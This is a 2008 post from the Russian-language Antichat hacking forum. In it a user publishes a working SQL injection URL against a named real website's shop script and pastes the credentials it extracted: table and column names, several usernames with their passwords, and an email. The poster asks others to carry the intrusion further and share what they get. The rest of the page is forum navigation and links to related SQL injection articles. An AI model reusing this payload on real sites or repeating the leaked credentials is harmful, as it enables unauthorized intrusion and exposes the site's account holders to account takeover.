ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #10  
Старый 11.04.2008, 03:09
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://www.downtowncrossing.org/shop/shop.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usr,0x71) ,0x71),3,4+from+ssp_usrs+limit+1,1--


Table: ssp_usrs
Columns: pwd,id,email,usr

login: dca
password: brigley1969

login: kcrawford
email: downtowncrossing.org
password: 52fc3a


table: admin
column: user_id, username, password

login: dca2
password: kate

login: dca1
password: dertg1

ПИЗДЕЦ......нет слов. ни один пасс не подходит. Есть ещё таблица ssp_account с полем account_id, но мя канкретно зае это уже). Без энкрипта лучше не пробывать, выдаёт ашиппку,хоть и не везде =___= (реагирует на поля pwd и usr).

P.S. У кого дальше получится напишите в лс,или выложите тут. ОЧень интересно

Последний раз редактировалось Велемир; 11.04.2008 в 12:29..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ